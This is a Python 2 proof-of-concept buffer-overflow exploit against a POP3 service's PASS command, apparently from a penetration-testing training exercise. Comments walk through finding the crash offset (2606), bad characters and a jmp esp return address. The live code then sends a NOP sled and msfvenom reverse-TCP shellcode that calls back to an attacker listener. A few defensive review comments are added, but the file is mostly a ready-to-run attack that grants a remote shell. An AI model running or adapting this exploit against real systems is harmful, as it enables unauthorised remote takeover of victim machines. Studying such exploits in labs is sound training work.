Python Script for Buffer_Overflow (BO)
#!/usr/bin/python
"""Buffer-overflow proof-of-concept sent to a POP3 service (Python 2 script).

The numbered comment blocks below record how the crash offset, the bad
characters and the return address were derived with the tools named in
them; the live code at the bottom only assembles the final ``buffer`` and
sends it as the argument of a POP3 ``PASS`` command.  No result is
returned: success or failure is reported solely through ``print``.
"""
import socket
# Plain TCP client socket.  NOTE(review): it is never shut down or closed
# below, so the connection is only released when the interpreter exits.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# -------------------1st Step-------------------
# Framing similar characters (say, A) to crash the application
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
# buffer = 'A' * 3000
# note down EIP register value and check in pattern_offset
# note down the offset value and use it in the script
# -------------------2nd Step-------------------
# Find the crash point by generating patterns with <pattern_create.rb>
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 39694438
# buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9"
# Results [*] Exact match at offset 2606
# -------------------3rd Step-------------------
# Frame the script (buffer as Variable name) in such a way that it can hold shell code
# buffer = 'A' * 2606 + 'B' * 4 + 'C' * (3000-2606-4)
# -------------------4th Step-------------------
# bad characters can be downloaded from Internet or can be created using any script uploaded in github
# badchar = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10"
# "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
# "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
# "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
# "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
# "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
# "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
# "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
# "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
# "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
# "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
# "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
# "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
# "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
# "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
# "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")
# buffer = 'A' * 2606 + 'B' * 4 + badchar
# -------------------5th Step-------------------
# In Immunity Debugger
# !mona modules (Search of jmp esp)
# Identify the Jump ESP
# nasm > jmp esp
# Results: 00000000 FFE4 (jmp esp)
# In Immunity Debugger
# !mona find -s "\xff\xe4" -m slmfc
# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
# 5f4a358f (memory allocation pointer)
# Reverse the above pointer as "\x8f\x35\x4a\x5f"
# Creating shell / Payload
# msfvenom -p windows/shell_reverse_tcp LHOST=10.X.X.X LPORT=443 -b "\x00\x0a\x0d" -f c
# Opaque payload bytes as emitted by the msfvenom command above (-b asked it
# to avoid \x00, \x0a and \x0d).  The listener address/port are baked into
# these bytes, so the string must be regenerated rather than edited.
shell = ("\xd9\xc3\xd9\x74\x24\xf4\xba\xa4\x91\xf3\x3c\x5e\x29\xc9\xb1"
"\x52\x83\xc6\x04\x31\x56\x13\x03\xf2\x82\x11\xc9\x06\x4c\x57"
"\x32\xf6\x8d\x38\xba\x13\xbc\x78\xd8\x50\xef\x48\xaa\x34\x1c"
"\x22\xfe\xac\x97\x46\xd7\xc3\x10\xec\x01\xea\xa1\x5d\x71\x6d"
"\x22\x9c\xa6\x4d\x1b\x6f\xbb\x8c\x5c\x92\x36\xdc\x35\xd8\xe5"
"\xf0\x32\x94\x35\x7b\x08\x38\x3e\x98\xd9\x3b\x6f\x0f\x51\x62"
"\xaf\xae\xb6\x1e\xe6\xa8\xdb\x1b\xb0\x43\x2f\xd7\x43\x85\x61"
"\x18\xef\xe8\x4d\xeb\xf1\x2d\x69\x14\x84\x47\x89\xa9\x9f\x9c"
"\xf3\x75\x15\x06\x53\xfd\x8d\xe2\x65\xd2\x48\x61\x69\x9f\x1f"
"\x2d\x6e\x1e\xf3\x46\x8a\xab\xf2\x88\x1a\xef\xd0\x0c\x46\xab"
"\x79\x15\x22\x1a\x85\x45\x8d\xc3\x23\x0e\x20\x17\x5e\x4d\x2d"
"\xd4\x53\x6d\xad\x72\xe3\x1e\x9f\xdd\x5f\x88\x93\x96\x79\x4f"
"\xd3\x8c\x3e\xdf\x2a\x2f\x3f\xf6\xe8\x7b\x6f\x60\xd8\x03\xe4"
"\x70\xe5\xd1\xab\x20\x49\x8a\x0b\x90\x29\x7a\xe4\xfa\xa5\xa5"
"\x14\x05\x6c\xce\xbf\xfc\xe7\xfb\x34\xfe\x81\x93\x48\xfe\x6c"
"\xdf\xc4\x18\x04\x0f\x81\xb3\xb1\xb6\x88\x4f\x23\x36\x07\x2a"
"\x63\xbc\xa4\xcb\x2a\x35\xc0\xdf\xdb\xb5\x9f\xbd\x4a\xc9\x35"
"\xa9\x11\x58\xd2\x29\x5f\x41\x4d\x7e\x08\xb7\x84\xea\xa4\xee"
"\x3e\x08\x35\x76\x78\x88\xe2\x4b\x87\x11\x66\xf7\xa3\x01\xbe"
"\xf8\xef\x75\x6e\xaf\xb9\x23\xc8\x19\x08\x9d\x82\xf6\xc2\x49"
"\x52\x35\xd5\x0f\x5b\x10\xa3\xef\xea\xcd\xf2\x10\xc2\x99\xf2"
"\x69\x3e\x3a\xfc\xa0\xfa\x4a\xb7\xe8\xab\xc2\x1e\x79\xee\x8e"
"\xa0\x54\x2d\xb7\x22\x5c\xce\x4c\x3a\x15\xcb\x09\xfc\xc6\xa1"
"\x02\x69\xe8\x16\x22\xb8")
# Final layout, left to right: 2606 filler bytes (the offset found in the
# 2nd step), the 4-byte little-endian return address from the 5th step,
# ten \x90 (x86 NOP) bytes, then the payload.  In Python 2 these are all
# byte strings, which is why plain str concatenation works here.
# Defensive note: the resulting PASS argument is well over 2.5 KB, far
# beyond any legitimate credential; a server-side length limit on command
# arguments, or a protocol-aware IDS rule on oversized POP3 commands, would
# reject this request before the vulnerable copy is reached.
buffer = 'A' * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 10 + shell
# ------------------------------------------------------------------------------------
try:
    print "\nSending evil buffer..."
    s.connect(('10.X.X.X',110)) # IP Address of the Victim machine
    data = s.recv(1024)  # first server reply; drained but never inspected
    s.send('USER username' + '\r\n')
    data = s.recv(1024)  # reply to USER; also drained, not checked for +OK/-ERR
    s.send('PASS ' + buffer + '\r\n')  # the oversized PASS argument is what triggers the overflow
    print "\nDone..!!"
# NOTE(review): a bare except also swallows KeyboardInterrupt and any
# send()/recv() error, and then reports every failure as a connect failure.
# `except socket.error as e:` with the error printed would be more honest.
except:
    print "Could not connect to POP3..!"
# NOTE(review): no s.close() / s.shutdown() on either path.
# --------------------THE END-----------------
# -----------------HAPPY LEARNING-------------